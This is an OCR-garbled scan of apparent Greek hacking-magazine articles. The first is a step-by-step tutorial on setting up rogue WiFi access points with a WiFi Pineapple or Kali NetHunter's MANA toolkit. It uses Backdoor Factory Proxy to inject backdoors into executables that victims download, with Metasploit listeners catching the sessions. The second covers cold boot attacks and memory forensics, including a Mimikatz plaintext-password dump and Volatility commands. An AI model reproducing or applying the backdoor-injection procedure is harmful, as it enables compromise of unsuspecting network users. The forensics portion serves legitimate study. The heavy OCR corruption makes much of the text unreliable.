θύρες ἡ και διαφορετικἁ payloads. Σε αυτή την περίπτωση, βέβαια, θα έπρεπε va ðn- 
μιουργήσουμε και τους αντἰστοιχους Metasploit listeners. Αφού πραγματοποιήσου- 
µε τις επιθυμητὲς ρυθμίσεις, αποθηκεύουµε το αρχείο κι εκτελούµε το /usr/share/ 
bdfproxy/wpBDF.sh. Το συγκεκριμένο script θα µας ζητήσει να προσδιορίσουμε opl- 
σµένα στοιχεία που αφορούν στη διασύνδεση του υπολογιστή µας µε TO Internet 
και µε то WiFi Pineapple (interface μεταξύ pineapple και υπολογιστή, interface προς 
το Internet, διεύθυνση gateway, к.а). Αμέσως μετά μπορούμε να δημιουργήσουμε 
τον απαραἰτητο listener στο Metasploit (µε τον τρόπο που εἶδαμε νωρίτερα) και να 
ξεκινήσουμε το BDF Proxy. AUTO επιτυγχάνεται µε την εκτέλεση του /usr/share/ 
bdfproxy/bdf_proxy.py. Апо αυτἠ τη στιγμὴ κι ἐπειτα, μπορούμε να περιμένουμε τη 
σύνδεση των υποψήφιων θυμάτων στο δίκτυο του Ανανὰ. Όσοι µέσω αυτού επιχει- 
ρήσουν να κατεβάσουν κἀποιο εκτελἑἐσιµο αρχείο, θα καταλήξουν να εκτελέσουν 
ἑνα backdoor στο σὐστημά τους. 


Επίθεση µε το NetHunter 


Στο προηγούμενο τεύχος παρουσιάσαµε τις λειτουργίες του Kali NetHunter. Σε αυτό 
το τεύχος θα συνδυάσουμε τις δυνάμεις TOU µε αυτὲς του Backdoor Factory. Н συ- 
γκεκριµένη επίθεση ομοιάζει µε αυτήν που πραγματοποιήσαμε προηγουμένως, µε 
τη βοήθεια του Ανανά: Θα δημιουργήσουμε Eva κακόβουλο ασύρματο δίκτυο, στο 
onoio θα εκτελούμε επιθέσεις Man-in-The-Middle. Μέσω του Backdoor Factory θα 
προσθέτουμε κακὀβουλο κὠδικα σε ὁλα τα εκτελέσιμα αρχεία που προσπαθεἰ να 
κατεβάσει ο EKGOTOTE χρήστης και, ἐτσι, χωρίς να επιστρατεύσουμµε κάποια TEXVIKN 
Social Engineering, θα φυτεύουµε backdoors µε άνεση. 


Για αυτή την επίθεση θα χρειαστούμε και πάλι το Backdoor Factory Proxy, nou χρη- 
σιμοποιήσαμε παραπάνω. Πα καλὴ µας τύχη, το συγκεκριµένο εργαλείο ἠδη συνο- 
devel TO Kali NetHunter. Επιπρόσθετα, επειδἠ η карта δικτύου της συσκευής µας 
θα χρησιμοποιείται για τη σύνδεση στο Internet, θα χρειαστούμε και µια πρόσθετη. 
Αυτἠ θα παίξει το ρόλο του παγιδευµένου WiFi Access Point. Πα то σκοπὀ αυτὸ uno- 
ρούμε να χρησιμοποιήσουμε µια EEWTEPIKN κάρτα ασύρματης δικτύωσης, την οποία 
θα συνδέσουµε στη συσκευἠ µέσω ενὸς καλωδίου OTG. Αφού ξεμπερδέψουµε µε TO 
hardware, ανοίγουμε την εφαρµογἡ Terminal Emulator και πληκτρολογούμε τα εξἠς: 


$ su 
# cd /usr/share/mana-toolkit/run-mana/ 
# ./start-nat-simple-bdf.sh 


Με αυτόν Tov τρὀπο ξεκινά µια τροποποιημένη εκδοχή της επίθεσης MANA, που 
υποστηρίζει τη χρήση του Backdoor Factory. Στη συνέχεια ανοίγουμε Eva vo na- 
ράθυρο του τερματικού, χωρὶς να κλείσουμε το προηγούμενο, για να ρυθµἰσουµε το 
ΒΡΕ Ργοχγ. 


nano /etc/bdfproxy/bdfproxy.cfg 


Μέσα στο αρχεἰο εργαζόµαστε µε Tn λογική που αναφέραμε νωρίτερα: Εντοπίζουµε 
την ενότητα [targets] και πραγματοποιούμε τις επιθυμητές ρυθμίσεις για κάθε τύπο 
εκτελἐσιμου αρχείου. Αφού αποθηκεύσουµε το αρχείο, ξεκινάμε το BDF Proxy EKTE- 
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λὠντας το ομώνυμο προγραμματάκι (bdfproxy). Αμέσως μετὰ avoiyoupe Eva τρίτο 
παράθυρο στο Terminal Emulator και ξεκινάμε το Metasploit: 


/etc/init.d/postgresql start 
/etc/init.d/metasploit start 


msfconsole -r /usr/share/bdfproxy/bdfproxy_msf_resourcs.rc 


H gvToÀn msfconsole απαιτεἰ μερικά λεπτά για να εκτελεστεἰ και δεν πρέπει va 
απογοητευτεἰτε ano την καθυστέρηση. Όπως θα διαπιστώσετε, TO Metasploit θα 
ξεκινήσει και θα ρυθμιστεὶ αυτόματα, σύμφωνα µε боа εισαγάγαµε στο αρχείο puð- 


©&® ΜΑΝΑ Evil Access Point 


mana-nat-simple-bdf mana 


The Mana script that does full NAT & BDFProxy 
HTTP routing to port 8080. 


#!/bin/bash 


upstream=wlanO 

phy=wlan1 
conf=/etc/mana-toolkit/hostapd- 
karma.conf 
hostapd=/usr/lib/mana-toolkit/ 
hostapd 


#service network-manager stop 
rfkill unblock wlan 


ifconfig Sphy up 


sed -i "s/‘interface=.*$/ 
interface=Sphy/" Sconf 
Shostapd Sconf& 

sleep 10 


Update 


Στην εφαρµογή NetHunter Home μπορούμε να £K- 
κινήσουμε ὀλες τις λειτουργ/ες του Kali NetHunter. 
То ἰδιο Kal µε TO BDF Proxy, γι’ αυτούς που Ва- 
ριούνται να γράψουν λίγες εντολἐς στο TEPLATIKO 
(ντροπή :P). Πηγαίνοντας στη καρτέλα MANA Evil 
Access Point Και στο πεδίο mana-nat-simple-bdf, 
κάνουμε τις απαραίτητες ρυθμίσεις, πατάμε update 
ка! στο μενού επιλέγουμε στο Start mana. Εὐκολα, 
γρήγορα ki апда. 
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µίσεων του BDF proxy. Πλέον, η συσκευἠ 
μας θα ἐχει μετατραπεί σε ша παγίδα σαν 
αυτή που στήσαμε µε то Pineapple: Όσοι 
συνδέονται στο δίκτυό µας και κατεβά- 
ζουν εκτελἐσιµα αρχεία, θα λαμβάνουν 
κι ἑνα backdoor. Κάθε фора που κάποιο 
θύμα εκτελεἰ το μολυσμένο αρχείο, θα 
δημιουργείται µια σύνδεση προς τον 
listener του Metasploit που εκτελείται 
στη συσκευή µας. Παρεμπιπτόντως, για 
να δούμε τις συνδέσεις του εἶδους που 
xouv NON πραγματοποιηθεί, арке! va 
πάμε στο τρίτο παράθυρο του τερµατι- 
κοὐ (εκεἰ ὀπου τρέχει TO Metasploit) και 
να δώσουμε την EVTOAN sessions -l. Το τι 
μπορείτε να κάνετε апо εκεἰ και πέρα το 
αφήνουμε στη φαντασία σας. 


Προτροπή, αντί για επίλογο 


Όπως εἰδαμε η δηµιουργία µιας "πίσω 
πόρτας" σ' ἑνα σύστημα µέσω του BDF 
εἶναι µια αρκετά EUKOAN δουλειά, η οποία 
μπορεί να επιτευχθεἰ µε αρκετούς τρὀ- 
πους κι αρκετά εργαλεία. H αποτελεσµα- 
τικότητα µιας σχετικἠς επίθεσης εξαρτά- 
ται ano το χρησιμοποιούμενο payload, 
ano τις ευπάθειες TOU συστήμµατος-στό- 
Χου, ONWG επἰσης κι απὀ το опоо πρὀ- 
γραμμα προστασίας τρέχει. Φυσικά, 
ανάλογες παρατηρήσεις ισχύουν και για 
πολλὰ άλλα εἰδη επιθέσεων. Π' αυτὀ το 
λόγο, οφείλουμε να έχουμε πάντα τις 
τελευταίες ενημερώσεις για το σὐστημά 
μας, να προσέχουμε σε ποια ασύρματα 
δίκτυα συνδεόµαστε και να µην κατεβά- 
ζουμε αρχεία στα τυφλὰ. 
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Skill: Advanced 
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I can't remember, but my memory dump can! 


AnéXOUHE μόλις 6 χρόνια апо το ἐτος 2021, ὀπου και τοποθετείται το σενάριο της 
ταινίας Johnny Mnemonic. Μπορεί να µην ἐχουν εφευρεθεί (ακόµα) τα εγκεφαλικά 
εμφυτεύματα μνήμης, ойт να υπάρχει το επάγγελμα του data courier, αλλά υπάρχουν 
πολλά δεδομένα που θα θέλαμε να προστατεύσουμε και βρίσκονται όλα στη μνήμη. Όχι 
στη δικἠ µας, αλλά σε αυτή των υπολογιστών. 


bu catnbunnu 
of Project⁄ero.gr 


1 
I can t remember, but my memory dump can! 
κκ κκ 


H μνήμη RAM θεωρεῖται προσωρινἠ (volatile), διότι πρέπει να τροφοδοτείται µε peù- 
ра για να διατηρούνται τα δεδοµένα της. Πα να γίνει κατανοητὸς ο τρόπος λειτουρ- 
үіас̧ αυτὴς της μνήμης, μπορούμε να φανταστούμε τα κελιά της σαν κουβάδες που 
στον пато τους xouv τρύπες. Όταν vac κουβὰς εἶναι ἁδειος, θεωρούμε От! TO 
συγκεκριµένο κελὶ ἐχει την τιμή 0. Αντίστροφα, ὀταν vag κουβὰς εἶναι γεμάτος, 
θεωρούμε ὁτι το κελὶ EXE! την τιμή 1. Ὅμως, εξαιτίας των ανοιγμάτων στον пато, 
οι γεμάτοι κουβάδες παρουσιάζουν µια μικρὴ διαρροή και σταδιακά αδειάζουν. AUTÒ 
σημαίνει ὁτι κάθε KEAI που ἐχει την τιµή 1, αν το αφήσουμε στην τύχη του εἶναι θέμα 
χρόνου μέχρι ν' αποκτήσει την τιµή 0. Πα να διατηρήσουμε την τιμὴ 1 σε κἀποιο 
КЕЛІ, πρέπει να τροφοδοτούμε τον αντίστοιχο κουβά διαρκώς, ὥστε να αναπλη- 
ρώνουμε τις απώλειες της διαρροὴς και να µην αδειάζει. E, λοιπὸν, η μνήμη RAM 
λειτουργεὶ µε αυτόν ακριβώς τον τρόπο. Οι κουβάδες της βἐβαια δεν φέρουν κάποιο 
υγρό, αλλά ηλεκτρικὀ φορτίο. Έτσι, όταν διακὀπτουµε την τροφοδοσία της μνήμης, 
όλοι οι αποθηκευμένοι ассо! μετατρέπονται σταδιακὰἁ σε μηδενικά και τα δεδομένα 
χάνονται. 


Πριν ano μερικὰ χρόνια, µια ομάδα ερευνητὠν апо το πανεπιστήμιο του Princeton 
απέδειξε ὁτι τα δεδομένα διαγράφονται µε NPOBAEWINO τρὀπο. H ἰδια ομάδα ανέπτυ- 
Ee κι ἑναν αλγόριθμο για την ακριβἠ ανάκτηση των δεδομένων апо μνήμες των onoi- 
ων η τροφοδοσία εἰχε διακοπεί. Φυσικά, το Χρονικό περιθώριο για αυτή την εργασἰα 
ἦταν εξαιρετικά μικρὀ. Ωστόσο, ὁταν ἑψυξαν κἀποιες μνήμες µε υγρό ἀζωτο ἡ ακόµη 
και µε σπρέἑι αέρα (αυτό που χρησιμοποιούμε για τον καθαρισμό του πληκτρολογἰου), 
ο διαθέσιμος χρόνος αυξήθηκε δραματικά. Τελικά, η συγκεκριμένη ομάδα ερευνητὠν 
δημιούργησε Eva vo εἶδος επίθεσης που ονομάζεται Cold Boot Attack. 


ἨΕΡΡΗΚΗΕΕΗΕΗΕΗΕ 
НЕНЕН 


Όταν διακόπτουµε την τροφοδοσία σε ша μνήμη volatile, τα δεδομένα της μοιάζουν va 
εξατµίζονται σταδιακά. Στην εικόνα βλέπουμε µερικἀ στιγμιότυπα αυτής της διαδικασί- 
ας (5, 30, 60 ка! 300 δευτερόλεπτα μετά την διακοπή της τροφοδοσίας). 


Επίθεση ...στην ψύχρα! 

‘Evac επιτιθέμενος που EXE! φυσικἠἡ πρὀσβαση σε κάποιον υπολογιστή, ψύχει τις 
μνήμες RAM (εικὀνα 2) αμέσως μόλις διακόψει την παροχἠ ρεύματος ἡ, αν εἶναι 
δυνατὸν κάτι τέτοιο, πριν ακόμα κόψει το ρεύμα. Αμέσως μετὰ, µε τη χρήση του 
προγράμματος msramdmp!, που γράφτηκε καθ' οµοίωση του ram2usb (το πρὀγραμ- 
μα που χρησιμοποίησαν οι ερευνητές του Princeton), παἰρνει Eva ολοκληρωμένο 


1. Μπορείτε να το βρείτε στο http://mcgrewsecurity.com/oldsite/projectsf/msramdmp.1.html 
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αντίγραφο της μνήμης. Αργότερα, о επιτιθἐµενος рпорєі να ερευνήσει αυτό το αντἰ- 
үрафо της μνήμης και να αντλήσει πληροφορϊἰες που θα тау αδύνατο να πἀρει ano 
τον αναμμένο υπολογιστὴ και µε TO συμβατικὸ τρόπο, λόγω περιορισμένων δικαιω- 
μάτων. Σημειώστε оті аот τη μέθοδο xouv χρησιμοποιήσει και οι διωκτικὲς αρχὲς 
ορισμένων χωρών, ката την ἐφοδό τους σε σπίτια κατηγορουμένων για χάκινγκ. 


Εικόνα 2 
Н ψύξη της μνήμης επιτυγχάνεται πανεύκολα, 
ακόμα και µε τη χρήση ενός σπρέι καθαρισμού! 


Μα, τι μπορεί να περιέχει η μνήμη; 


H μνήμη RAM αποτυπώνει τη γενικότερη κατάσταση του συστήματος, λίγο πριν 
πραγματοποιηθεί η απὀκτηση του αντιγράφου (memory acquisition). Апо την HE- 
τἐπειτα ανάλυση του αντιγράφου (memory forensics), μπορούμε να αποκτήσουμε 
σημαντικἁ δεδομένα ὀπως τα ακόλουθα: 


ο Κλειδιά κρυπτογράφησης. 


ο Ἱστορικό περιήγησης Tou browser (ακὀµη κι αν εἶχε χρησιμοποιηθεί η λειτουρ- 
yia Private Browsing / Incognito). 


ο Ανοιχτά sockets (TCP / UDP) ἡ ανοιχτὲς πὀρτες (χρήσιμο ὁταν ἐχει διεξαχθεὶ 
µια επίθεση ñ ὀταν το σύστημα ἦταν μολυσμένο апо κακόβουλο λογισμικὀ). 


ο Ліста ανοιχτών αρχείων και ενεργών διεργασιών. 
ο Τιμές (κλειδιά) του registry – αν πρὀκειται για σύστημα µε Windows. 
ο Κρυμμένες διεργασίες ἡ διεργασίες που ἐχουν τερματιστεί. 


Συγκεντρώνοντας τα παραπάνω στοιχεία, μπορούμε να σχηµματίσουµμε µια συνολι- 
κἠ εικὀνα για την κατάσταση του συστήματος και την πρὀσφατη δραστηριότητα 
του χρήστη. Εκτὸς апо την ανάκτηση κωδικών και ἄλλων ευωαϊσθητων στοιχείων, η 
ανάλυση της μνήμης βοηθάει και στον εντοπισμό κακόβουλου λογισμικού, το οποίο 
όσο λειτουργεί ο υπολογιστἠὴς καταφέρνει να κρύψει την παρουσία του µε επιτυχία. 
Εξάλλου, µε την ἴδια διαδικασία μπορούμε va ανακτήσουµε ακόµα και ολόκληρα 
εκτελέἑσιµα αρχεἰα (EXE n DLL). AUTO σημαίνει ὁτι ἐχουμε τη δυνατότητα να πάρουμε 
éva αντίγραφο του εκάστοτε κακόβουλου προγράµµατος ακόµα κι αν εἶχε προλάβει 
να διαγράψει τον εαυτὀ TOU апо το δίσκο, σε µια προσπάθεια να δυσκολέψει τον 
εντοπισμὀὸ του. H αλήθεια εἶναι ὁτι αυτό το τελευταίο θα μπορούσε να επιτευχθεἰ και 
H£ µια ανάλυση των περιεχομένων του δίσκου. Γενικότερα, εξετάζοντας та περιεχὀ- 
μενα των δίσκων θα μπορούσαμε να συλλέξουμε пара πολλὲς πληροφορίες για το 
σύστημα, για τις δραστηριότητες του χρήστη και για Ta αρχεία του συστήµατος που 
EVOEXETAI να ¿xouv αλλοιωθεί. Ωστόσο, οι δύο µἐθοδοι (ανάλυση μνήμης κι ανάλυση 
δίσκων) παρουσιάζουν εντελώς διαφορετικἀ πλεονεκτήματα και δεν εἶναι EUKOAO va 
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ПЕКО СС2С2СККООДОДООСС _ С АССА 


συγκριθούν. Το μόνο σἰγουρο OT! όσο η κρυπτογράφηση των αποθηκευτικὠν µέσων 
κερδίζει ἐδαφος, η ανάλυση των περιεχομένων της μνήμης μοιάζει ευκολότερη καὶ 
αποδοτικὀτερη. 


Στη συνέχεια θα αναφερθούμε επιγραμματικὰἁ σε δυο δηµοφιλἠ εργαλεία του χώρου 
και αµέσως μετὰ θα εξετάσουμε Eva σενάριο ανάλυσης των περιεχομένων της μνή- 
μης ενὸς συστήματος. 


Mimikatz 


To Mimikatz εἶναι Eva εργαλεἰο ανοικτού κὠδικα για την ανάκτηση των κωδικών των 
χρηστών και υποστηρίζει αρκετὲς εκδόσεις των Windows. Φυσικά, οι κωδικοί ava- 
ктоута апо τη μνήμη και εἶναι σε μορφὴ plaintext. То ідо εργαλείο αξιοποιείται και 
στην εργασία που ακολουθεἰ την εκμετάλλευση µιας ευπάθειας (post-exploitation) 
- κι акр Вос γι' αυτὸ ἐχει ενσωματωθεί στο Metasploit framework. Το συγκεκριμένο 
πρὀγραμμα, αν και ἐχει λίγο πολύπλοκη σύνταξη (επίτηδες, σύμφωνα µε TOV δημι- 
ουργὀ του) θα Лёүарғ бт! εἶναι απαραἰτητο εργαλείο για όσους ασχολούνται µε την 
ασφάλεια των υπολογιστών. 


Qj mimikatz 2.0 alpha x86 (οε.εο) 


Sse 


С” Can 17 2615 01:24: 


„НИНИН. 
-HH ^ HH. 
HH ⁄ N HH 
HH N 2 HH 
'HH u ΠΒ’ 

'HHHHH” 


mimikatz 2.8 alpha (χ86} release "Kiwi en 

fe = 5 
Benjamin DELPY ‘gentilkiwi* < benjamin@gentilkiui.com > 
http://blog.gentilkiwi.com/mimikatz Coe .e0>) 
with 15 modules * * */ 


mimikatz H privilege: -:debug 
Privilege ’28’ OK 


HI 


mimikatz # sekurlsa::logonpasswords 


196973 (86006006: 9661aidd> 
Interactive from 1 
testing 
: testing—PC 
: §-1-5-21-2273366469-59151'79 76-964707529-1661 
που : 


[666666631 Primary 
Username : testing 
i testing—PC 
61f cSab6be7bc62929aad3b435b51484ee 
GOch69 48805 f 79 7bf 2a828B7973b8 9537 
8?7f8ed9157125ffc4da%eB6a7hb8G11ad8Ga53fel 


Authentication Id : Ø ; 
Session 5 
User Name : 


tspkg 


* Username 
= Domain 

* Password 
wdigest : 

ж Username 
ж Domain 

* Password 
kerberos 

* Username 
= Domain 

* Password 


ss 
ss - 


credman 


testing 
testing-PC 
test 


testing 
testing-PG 
test 


testing 
testing-PG 
test 


Εικόνα 3 

Με τη βοήθεια του Mimikatz, μπορούμε va ξετρυπώ- 
σουµε апо τη μνήμη του συστήµατος TO username 
ка! TO password του χρήστη. 
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BE C:\Users\testing\Downloads\Dumplt\Dumplt.exe 


DumpIt — vi.3.2.26116461 - One click memory memory dumper 
Copyright (ο) 2007 – 2011, Matthieu Suiche <http://www.msuiche.net> 
Copyright <c> 2018 - 2611. MoonSols <http://wuww.moonsols.com> 


Address space size: 1973676288 bytes < 1923 Mb> 
Free space size: 14294474752 bytes < 13632 ΜΡ} 


* Destination = 


--> Are you sure you want to continue? [υπ] 
+ Processing... 


Εικόνα 4 

Το εργαλείο dumpit εἶναι μικρὀ, διανέμεται δωρεάν και λειτουργεί 
άψογα. Με τη Bon@eid του μπορούμε να πάρουμε Eva πλήρες dump της 
μνήμης του συστήματος. 


Volatility Framework 


To Volatility εἶναι το πιο διαδεδομένο framework για Memory Forensics κι αποτελεὶ 
προϊόν ανοιχτού κὠδικα, γραμμένο σε Python. Χρησιμοποιείται για την εξαγωγἠ 
και την ανάλυση πληροφοριών, που περιέχονται σε ανακτημένα τμήματα της μνή- 
μης RAM. Τα memory dump που αναλύει το Volatility μπορούν να προέρχονται апо 
Windows (ΧΡ, 2003 Server, Vista, Server 2008, Server 2008 R2, 7, 8 k.An.), Linux, 
OS X n Android. Επιπρὀσθετα, To Volatility αναλύει kal crash dumps που παράγονται 
ano τα ἰδια τα Windows. Στο Kali Linux, στο опоіо στηριζόµαστε για τις ανάγκες του 
άρθρου, το Volatility υπάρχει προεγκατεστηµμένο. Περισσότερες πληροφορίες για 
την χρήση του μπορούμε να πάρουμε µε τους εξἠς δυο τρόπους: 


# volatility --help 
# volatility --info 
Οι σημαντικότερες παράμετροι που δέχεται το πρόγραµµα εἶναι οι ακόλουθες: 
e Imageinfo: περιγραφἠ της "εικόνας" της μνήμης 
e Datetime: ημερομηνία και ора της στιγμῆς που πάρθηκε To memory dump 
ο Pslist: εμφάνιση των ενεργὠν διεργασιών 
ο Files: катоуорасіа των ανοιχτὠν αρχείων 


ο Connections: παρουσίαση των δικτυακών συνδέσεων (μόνο στα ΧΡ και στον 
2003 Server) 


e Sockets: αναφορά των ανοικτὠν δικτυακών sockets (µόνο στα ΧΡ και στον 
2003 Server) 
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κκ κκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκκ-κκκκκ-κο« 


:/media/sf_Downloads/MEMORY DUMPS# volatility imageinfo -f osforensicsmemorydump.bin 
Volatility Foundation Volatility Framework 2.4 
Determining profile based on KDBG search... 


Suggested Profile(s) : Win7SP0x86, Win7SP1x86 
AS Layerl : mory (Kernel AS) 
AS Layer2 : Space (/media/sf_Downloads/MEMORY DUMPS/osforensicsmemorydump .bin) 
PAE type : 


DBS: 
KDBG : 
Number of Processors : 
Image Type (Service Pack) : 
КРСА for CPU 6: 
KUSER_SHARED_DATA 
Image date and time 015-0 15:45:58 U 
Image local date and time : 2015-01-20 07:45:58 -0800 


Εικόνα 5 
Μερικές γενικές πληροφορίες για TO Memory dump, ӧпос̧ 
προκύπτουν ano τη χρήστη Tou volatility. 


Τα μυστικά της μνήμης! 


О φανταστικὸς µας φίλος Παντελής, ¿xei πρὀσβαση σ' Eva "εχθρικό" σύστημα για 
λίγα μόνο δευτερόλεπτα. Το να προσπαθήσει να πάρει ἑνα αντίγραφο των εκατοντά- 
δων СВ που φιλοξενούνται στους δίσκους δεν μοιάζει µε την καλύτερη ιδέα κι ETO! 
αποφασίζει να πἀρει Eva αντἰγραφο της (ката πολὺ μικρότερης) μνήμης RAM. Ano 
την ανάλυση της μνήμης, о Παντελἠς ελπἰζει να αποκομίσει όλα εκεἰνα τα στοιχεία 
που φανερώνουν τις δόλιες ενέργειες και την ταυτότητα του ιδιοκτήτη του υπολο- 
γιστή. 


H εργασία του ξεκινά µε το εργαλεὶο Mimikatz, το οποίο αποκαλύπτει το username, 
ΤΟ hash του κωδικού αλλά και τον ἴδιο τον KWOIKO (δείτε την εικόνα 3) του xph- 
στη. Φυσικά αυτά τα στοιχεία εἶναι ελάχιστα και δεν επαρκούν στον Παντελῆ, о 
οποίος αποφασίζει να συνεχίσει µε το εργαλείο Dumpit (θα το βρείτε πανεύκολα µε 
μια αναζήτηση στο Google) προκειµένου να πάρει Eva αντίγραφο της μνήμης RAM 
(εικὀνα 4). Έχοντας στη διἀθεσή του TO memory dump, ο Παντελῆς μπορεί πλέον 
να εγκαταλεἰψει το "εχθρικό" σύστημα και να συνεχίσει την έρευνα στο δικὀ του 
μηχάνημα. Εκεἰ φορτώνει то Kali Linux, ὥστε να εκμεταλλευτεί τις δυνατότητες του 
navioxupou Volatility Framework. Σημειώστε ὁτι το εν λόγω εργαλεἰο θα το βρείτε 
στο Kali ως "volatility", eva σε ἄλλες διανομές απαντάται ως "vol.py". Με εξαίρεση 
аот τη διαφορὰ, το проүрарна συμπεριφέρεται παντού µε τον ἰδιο ακριβώς τρὀπο. 


{Ж Windows Task Manager 
File Options View Help 


Applications | Processes | Services | Performance | Networking | Users 


Image Name UserName CPU Метогу (... Description 


chrome.exe testing 00 51,564K Google С... 
chrome.exe testing 00 20,832K Google С... 
chrome.exe testing 00 34,972K Google C... 
chrome.exe testing 00 21,340K Соодіе С... 
csrss.exe 00 868 K 

dwm.exe testing 00 384K Desktop... 
explorer.exe testing 00 13,092K Windows... 
pidgin.exe testing 00 13,920K Pidgin 
taskhost.exe testing 00 692K HostProc... 
taskmar.exe testina 01 1.428K Windows... 

Εικόνα 6 


Στα δεξιά βλέπουμε Eva μέρος Tou task manager Tou "εχθρικού" συστήματος. Στα apioTepd βλέπου- 
µε та OXETIKG ευρήματα Tou volatility: Τη λίστα µε ὀλες τις ενεργές διεργασίες του συστήµατος. 
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O Παντελἠς αντιγράφει στον υπολογιστή του то rogue_pc_dump.raw, που περιέχει 
τα δεδομένα της μνήμης του ξένου υπολογιστῆ, και ξεκινά κάπως ἐτσι: 


# volatility imageinfo -f rogue_pc_dump.raw 


Μεταξύ ἄλλων, στην ἐξοδο του προγράμματος διακρίνουμε τα πιθανὰ профіл για 
το σύστημα апо το οποίο λήφθηκε To memory dump. Όπως рпорєіте va Seite στην 
εικόνα 5, τα πιθανὰ προφἰλ εἶναι τα Win7SP0x86 και Win7SP1x86. O Παντελἠς on- 
μειώνει айта τα δύο μεγέθη γιατὶ γνωρίζει ὁτι θα του χρειαστούν αμέσως. Το επὀ- 
μενο βήμα εἶναι να τσεκάρει τις διεργασίες που ἐτρεχαν στο σύστημα отау npe 
το αντίγραφο της μνήμης. Π' auth την εργασία το volatility πρέπει να γνωρίζει την 
ακριβἠ εκδοχἠ του λειτουργικού συστήματος κι εδὠ κολλάνε τα профіл που συνα- 
ντήσαμε λίγο πριν. O Παντελἠς δοκιμάζει και τα δύο και λαμβάνει αποτελέσµατα µε 
το δεύτερο (Win7SP1x86): 


# volatility -f rogue_pc_dump.raw --profile=Win7SP1x86 pslist 


To volatility εμφάνισε αμέσως µια εκτενἠ λίστα µε ὀλεςτις διεργασἰες που EKTEAOU- 
утау στο "εχθρικό" σύστημα (εικὀνα 6). Апо аот τη λἰστα, ἑνα πεπειραμένο μάτι 
μπορεί να αποκτήσει αµέσως µια εικόνα για τα òga συνέβαιναν σ' αυτὀ. Ανάμεσα 
στις διεργασίες του συστήματος συναντάμε το Chrome και το Pidgin. O Παντελἠὴς 
ξέρει OT! πρέπει να ξεψαχνίσει ὁλες τις διεργασἰες που ἐτρεχαν στο σύστημα, αλλά 
για προφανεἰς λόγους αποφασίζει να ξεκινήσει µε τα δύο προαναφερθέντα проүрар- 
ната. 


H μελέτη αρχίζει µε τον browser και το прото πράγμα που θέλει va μάθει ο Na- 
ντελἠς, εἶναι οι τοποθεσἰες που εἶχε επισκεφθεἰ ο χρήστης του συστήματος. Па το 
okono αυτό ζητά апо το volatility να αναλύσει TO memory dump και να εμφανίσει 
ὀλες τις συνδέσεις. Апо αυτό το κατεβατὀὸ και µε τη βοήθεια του grep, ο φίλος µας 
απομονώνει τις συνδέσεις που εἶχαν πραγµατοποιηθεἰ апо το Chrome: 


Y deltaHacker 


- ς 


| deltahacker.gr 


Ἀρχική | Εκπτώσεις & Πλούσια Δώρα | Συνδρομές & Πρόσβαση στα Video Tutorials | Ποιοι Είμαστε & Επικοινωνία | StL (TM) 


Σύνδεση 


Usemame 
Password 


5 Remember Με 


deltaHacker 040 | cookies 012 


Posted by PaNOS.Z | 22/01/2015, 21:27 | Published in cookies 


deltaHacker 040 | cookies 012 | η σημερινή νεολαία Google Site-Search 


| @ cat@swissjabber.org 
ə (7:40:18 AM) cat@crypt-am/5246710291421768382473104: Hi how are you? 
(7:40:22 AM) cat@swissjabber.org: fine thank you 


(7:40:30 AN) cat@cryptam/5246710291421768382473104:1 think that Tam protected Ê 
(7:40:35 AM) cat@swissjabber.org: are you sure? 
(7:40:54 AM) cat@crypt.am/5246710291421768382473104: Of course! Why? 


dot-is domains, εύκολα και οικονομικά ° 


Posted by subZraw | 15/01/2015, 11:10 | Published in /devirandom, free articles 


Га το πρώτο δε βάζουμε το χέρι µας στη φωτιά, ωστόσο για το δεύτερο έχουµε 


| Ба ра ενδιαφέρουσα πρόταση. Н κατάληξη "5" top-level domain (TLD) SSD Disk 
της Ισλανδίας και µε επιλογή ενός κατάλληλου ονόµατος μπορούμε να έχουµε 
μερικά έξυπνα domain hacks, όπως, тту. τα who is, mouratid.is κά. Τι λέτε ри он | Ф Insert | © Smite! | Ф Attention! 


Ἔχετε κάποια Ιδέα για το δικό σας dot-is domain i 


Εικόνα 7 
Οι δύο κύριες εφαρμογὲς που εκτελούνταν στο ξένο μηχάνημα. 
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root@kali: # volatility -f osforensicsmemorydump.bin --profile=Win7SP1x86 netscan | grep chrome 
Volatility Foundation Volatility 
TCPv4 2 7 6.58.209.4: ESTABLISHED 3008 chrome .ex 
TCPv4 5 ; 7 .194.67.100:443 ESTABLISHED 3008 
TCPv4 © 3 189519 ESTABLISHED 3008 
TCPv4 у, 6 S125 ай 0 ESTABLISHED 3008 chrome 
TCPv4 J Ç 216.58. ESTABLISHED 3008 chrome 
ν 3 6 : ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 98 chrome.exe 
ESTABLISHED 3008 chrome.ex 
ESTABLISHED 3008 chrome 
ESTABLISHED Е chrome 
ESTABLISHED 300 chrome 
ESTABLISHED 3 chrome 
ESTABLISHED 3008 chrome 
ESTABLISHED 3008 chrome 
CLOSED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
ESTABLISHED 
A SHED 


Αναλύοντας Τα περιεχόμενα της μνήμης, To volatility εντόπισε όλες τις δι- 
κτυακές συνδέσεις του συστήματος. Με τη βοήθεια του grep καταφέραμε να 
απομονώσουμε εκείνες που σχετίζονται µε τον Chrome. 


# volatility -f rogue_pc_dump.raw --profile=Win7SP1x86 netscan | grep 
chrome 


То 2014, η ομάδα που αναπτύσσει To Volatility εἰχε διοργανώσει Eva διαγωνισμὀ ðn- 
μιουργίας νέων plugins για To framework. Κάπως ἐτσι προέκυψαν δεκάδες χρήσιμες 
επεκτάσεις, τις οποίες μπορούμε να βρούμε πανεύκολα στο Διαδίκτυο. ‘Eva апо αυτά 
τα plugins εἶναι το chromehistory. Με την ευκαιρία, πρέπει να πούμε От! υπάρχουν 
παραλλαγές του για κάθε δημοφιλἠ browser. Όπως καταλαβαίνετε, µε τη βοήθεια 
αυτού του πρόσθετου το volatility µπορεί να ανακτήσει το ιστορικὀ περιήγησης του 
Chrome, ano To memory dump! Па να εγκαταστήσει ο Παντελἠς το chromehistory 
στο Kali Linux, εκτέλεσε τα ακόλουθα: 


# cd /usr/share/volatility/contrib/plugins/ 

# git clone https://github.com/superponible/volatility-plugins.git 
Αμέσως μετὰ επέστρεψε στον κατάλογο ὀπου εἶχε τοποθετήσει TO memory dump, 
προκειµένου να συνεχίσει την εργασία του. Απὸ εκεἰ εκτέλεσε και πάλι το volatility, 


